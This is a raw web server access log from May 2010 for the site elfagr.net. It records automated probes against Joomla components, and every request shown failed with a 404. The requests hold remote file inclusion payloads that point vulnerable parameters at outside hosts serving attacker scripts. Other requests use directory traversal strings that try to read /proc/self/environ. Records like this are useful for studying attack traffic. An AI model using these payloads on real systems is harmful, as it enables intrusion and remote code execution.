72.26.122.245 - - [07/May/2010:03:47:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
72.26.122.245 - - [07/May/2010:03:47:32 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
72.26.122.245 - - [07/May/2010:03:47:32 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:49:10 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:49:10 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:49:19 -0700] "GET /logs/access.log%20%20////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
88.191.39.162 - - [07/May/2010:03:50:03 -0700] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
212.174.28.46 - - [07/May/2010:03:50:56 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.174.28.46 - - [07/May/2010:03:51:04 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.174.28.46 - - [07/May/2010:03:50:56 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.174.28.46 - - [07/May/2010:03:51:00 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.174.28.46 - - [07/May/2010:03:51:00 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.174.28.46 - - [07/May/2010:03:51:00 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
124.49.100.254 - - [07/May/2010:03:55:02 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:55:02 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:55:02 -0700] "GET /logs/access_091126.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:55:26 -0700] "GET /logs/access_091126.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:55:35 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:55:35 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:55:37 -0700] "GET /logs/access_091126.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:55:37 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
124.49.100.254 - - [07/May/2010:03:55:46 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.26.122.245 - - [07/May/2010:03:56:13 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
72.26.122.245 - - [07/May/2010:03:56:13 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
72.26.122.245 - - [07/May/2010:03:56:04 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
213.91.132.141 - - [07/May/2010:03:56:54 -0700] "GET /logs/access.log/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
213.91.132.141 - - [07/May/2010:03:57:03 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
213.91.132.141 - - [07/May/2010:03:57:03 -0700] "GET /logs/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
114.108.151.149 - - [07/May/2010:03:59:12 -0700] "GET ///administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:59:22 -0700] "GET /logs////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
114.108.151.149 - - [07/May/2010:03:59:22 -0700] "GET /logs/access_100114.log%20%20////administrator/components/com_moofaq/css/file_includer.php?file=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
93.158.149.32 - - [07/May/2010:04:01:02 -0700] "GET /test/ad.swf HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
89.110.148.155 - - [07/May/2010:04:03:24 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:03:33 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:03:25 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:03:50 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:03:50 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:03:50 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:02 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:03 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:03:54 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:00 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:09 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:01 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:49 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:49 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:58 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:50 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:51 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:59 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:51 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:05:00 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:04:52 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
174.133.197.114 - - [07/May/2010:04:06:25 -0700] "GET /logs/access.log/index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [07/May/2010:04:06:34 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [07/May/2010:04:06:25 -0700] "GET /logs/index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [07/May/2010:04:06:57 -0700] "GET /logs/access.log/index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [07/May/2010:04:06:48 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [07/May/2010:04:06:48 -0700] "GET /logs/index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:08:07 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:07:59 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:07:59 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:08:25 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:08:16 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:08:17 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
99.39.2.249 - - [07/May/2010:04:10:15 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [07/May/2010:04:10:57 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:11:02 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:11:02 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:11:11 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:12:29 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:12:29 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:12:29 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:12:56 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:13:05 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:12:56 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:13:22 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:13:31 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:13:23 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
211.174.185.131 - - [07/May/2010:04:15:05 -0700] "GET /logs/access_100114.log//administrator/components/com_moofaq/css/file_includer.php?file=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.174.185.131 - - [07/May/2010:04:14:56 -0700] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.174.185.131 - - [07/May/2010:04:14:56 -0700] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
80.71.1.68 - - [07/May/2010:04:15:30 -0700] "GET /logs/access_091203.log//components/com_flyspray/startdown.php?file=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
80.71.1.68 - - [07/May/2010:04:15:31 -0700] "GET /components/com_flyspray/startdown.php?file=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
80.71.1.68 - - [07/May/2010:04:15:39 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
89.110.148.155 - - [07/May/2010:04:19:57 -0700] "GET /index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:19:57 -0700] "GET /logs/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
89.110.148.155 - - [07/May/2010:04:19:58 -0700] "GET /logs/access.log/index.php?option=com_agora&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
211.174.185.131 - - [07/May/2010:04:24:38 -0700] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.174.185.131 - - [07/May/2010:04:24:29 -0700] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.174.185.131 - - [07/May/2010:04:24:29 -0700] "GET /logs/access.log%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.174.185.131 - - [07/May/2010:04:25:03 -0700] "GET /logs/access_100114.log%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://tiyoavianto.com/wp-includes/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
99.39.2.249 - - [07/May/2010:04:27:05 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [07/May/2010:04:27:06 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [07/May/2010:04:27:00 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [07/May/2010:04:27:09 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [07/May/2010:04:27:12 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [07/May/2010:04:27:15 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [07/May/2010:04:33:35 -0700] "GET //action.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [07/May/2010:04:38:34 -0700] "GET /logs/access.log///action.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [07/May/2010:04:38:34 -0700] "GET //action.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
